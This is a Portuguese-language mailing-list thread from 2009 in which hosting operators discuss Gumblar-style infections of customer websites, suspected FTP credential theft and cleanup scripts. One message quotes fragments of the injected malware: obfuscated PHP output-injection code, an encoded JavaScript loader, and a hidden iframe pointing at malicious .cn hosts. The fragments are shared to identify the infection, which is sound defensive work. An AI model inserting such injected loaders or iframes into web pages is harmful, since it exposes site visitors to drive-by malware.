[GTER] RES: RES: RES: Virus em sites

Mon Jun 1 15:45:51 -03 2009

É isso mesmo Dilson

Já vi vários com iframe apontado para um endereço na china.

Achei 3 soluções para varrer o servidor.

Uma em bash - http://www.blog.isra3l.net/?p=184
Duas em PHP - 
http://www.danielansari.com/wordpress/2009/05/automatic-removal-of-gumblarma
rtuz-trojan/
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about
-this-injected-script/

[]'s
Alexandre Gorges
http://algorges.blogspot.com
http://www.dag.eti.br
MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com

> From: NOC NeoGrid <security at neogrid.com>
> Reply-To: Lista GTER <gter at eng.registro.br>
> Date: Mon, 1 Jun 2009 15:38:48 -0300
> To: Lista GTER <gter at eng.registro.br>
> Subject: [GTER] RES:  RES:  RES:  Virus em sites
> 
> Olá Alexandre,
> 
> Suspeito fortemente que a máquina do "cliente" que tem acesso FTP ao site,
> esteja comprometida...
> 
> OBS: Pode ter ocorrido algum bloqueio no sistema de AV ou AS... segue o link:
> http://eng.registro.br/pipermail/gter/2009-May/023993.html
> 
> Att,
> 
> Dilson
> NOC - Neogrid
> www.neogrid.com
> 
> -----Mensagem original-----
> De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome
> de Alexandre Gorges
> Enviada em: segunda-feira, 1 de junho de 2009 15:29
> Para: Lista GTER
> Assunto: Re: [GTER] RES: RES: Virus em sites
> 
> Não recebi, talvez foi moderado.
> 
> Mas vou colocar partes do código, acho que assim não será moderado, visto
> que não tem função nenhuma.
> 
> Na programação PHP, o código é parecido com esse:
> 
> #is’,$s,$a))
> foreach($a[0] as $v) if(count(explode(”\n”,$v))>5){
> $e=preg_match(’#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#’,$v) ||
> preg_match(’#[\(\[](\s*\d+,)20,}#’,$v);
> if((preg_match(’#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strp
> os;($v,’[removed]‘)))$s=str_replace($v,”,$s);}
> $s1=preg_replace(’##’,”,$s);
> if(stristr($s,’body’))
> s="preg_replace(’#(\s*body)#mi’,TMP_XHGFJOKL.’\1′,$s1);elseif(($s1!=">body’)
> )>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function
> tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'
> ])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_statu
> s(1) as $v)if(($a=$v['name'])==’tmp_lkojfghx’)return;else
> $s[]=array($a==’default output handler’?false:$a);
> for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob
> _start(’tmp_lkojfghx’);for($i=0;$i
> 
> Na programação Java Script, o código é tipo assim:
> 
> (’%3CTPsSscrSsidNptNJn%20cM7sd6KrcTP%3D%2FNJn%2F9cM74TP%2E247TP%2E2%2E1NJn9c
> M75%2FcM7jquedNrSsy%2EcM7jsHY%3E%3C%2FSssTPcuvjripuvjtSs%3E’).replace(/TP|NJ
> n|HY|uvj|dN|Ss|d6K|cM7/g,""));
> 
> Ou então uma chamada para um endereço que carrega o java:
> 
> http://b.rtbn2.cn/E/J.JS'
> 
> No uso do iframe, o endereço varia muito, mas é algo assim:
> 
> iframe 
> src="http:%20//%20liteautotoponline%20.cn%20/%20ts%20/%20in.cgi?mozila11"
> style="visibility: hidden;" height="4" width="2" iframe
> 
> []'s
> Alexandre Gorges
> http://algorges.blogspot.com
> http://www.dag.eti.br
> MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com
> 
> 
> 
> 
>> From: NOC NeoGrid <security at neogrid.com>
>> Reply-To: Lista GTER <gter at eng.registro.br>
>> Date: Mon, 1 Jun 2009 11:03:49 -0300
>> To: Lista GTER <gter at eng.registro.br>
>> Subject: [GTER] RES:  RES:  Virus em sites
>> 
>> Bom dia,
>> 
>> Mandei um "exemplo" do código para saber se era similar ao que foi encontrado
>> nos sites de quem iniciou a "thread", mas ninguém respondeu ( nem que sim,
>> nem
>> que não ).
>> Seria interessante mostrar o que identificaram nos arquivos, assim evitamos
>> diversas "possibilidades".
>> 
>> Att,
>> 
>> Dilson
>> NOC - Neogrid
>> www.neogrid.com
>> 
>> -----Mensagem original-----
>> De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em
>> nome
>> de Julio Arruda
>> Enviada em: segunda-feira, 1 de junho de 2009 10:47
>> Para: Grupo de Trabalho de Engenharia e Operacao de Redes
>> Assunto: Re: [GTER] RES: Virus em sites
>> 
>> Alexandre Gorges wrote:
>>> Bom dia, Toledo
>>> 
>>>>> Já foi desconsiderado isso, no servidor não tem nenhum usuário criado.
>>>>> Pesquisando pelo malware Gumblar, vi que a senha é descoberta
>>>>> na máquina do usuário com spyware. Muitos relatos de senhas
>>>>> capturadas com quem usa o Filezilla para acesso ao FTP.
>>>> Sim pode ocorrer dessa forma, mas a probabilidade do spywave infectar
>>>> justamente aqueles clientes que fazem FTP com vc é infima.
>>>> Teriam que infectar milhares para encontrar um que hospeda com você e que
>>>> faz ftp.
>>>> Além disso, são mais de um cliente seu, o que complica as probabilidade.
>>>> Imagino que haja um ponto em comum entre eles(clientes).
>>> 
>>> Mas eu não estou dizendo que está acontecendo apenas comigo.
>>> Se você pesquisar por Gumblar, irá ver vários casos de troca de site por
>>> FTP. 
>>> De 730 domínios, foram infectados aqui 5 sites. E clientes sem relação entre
>>> eles, nem o desenvolvedor dos sites é o mesmo.
>>> Um amigo de outro provedor, também relatou mesmo problema. Para alguns
>>> clientes apenas.
>> 
>> Vamos imaginar que somente estes 5 fizeram updates via FTP desde que
>> houve o problema ?
>> Isto poderia explicar por que os outros nao foram 'contaminados' ?
>> Eu sou um pouco paranoico, e se alguem comprometer uma maquina minha,
>> mesmo que tenha aparencia de ser algo 'periferico' (os arquivos FTP), eu
>> ao menos daria uma verificada para ver se nao teve algo mais. Obvio que
>> e' facil para alguem que nao administra isto falar :-), mas...
>> 
>> Uma outra coisa que voce pode tentar fazer e' dar uma verificada no
>> trafego deste servidor, ver se nao tem sessoes outgoing dele
>> 'inesperadas', um tipo de NBA manual :-)..Um outros facil, verificar
>> trafego para porta tcp 6667 outbound.
>> --
>> gter list    https://eng.registro.br/mailman/listinfo/gter
>> 
>> --
>> gter list    https://eng.registro.br/mailman/listinfo/gter
> 
> 
> --
> gter list    https://eng.registro.br/mailman/listinfo/gter
> --
gter list    https://eng.registro.br/mailman/listinfo/gter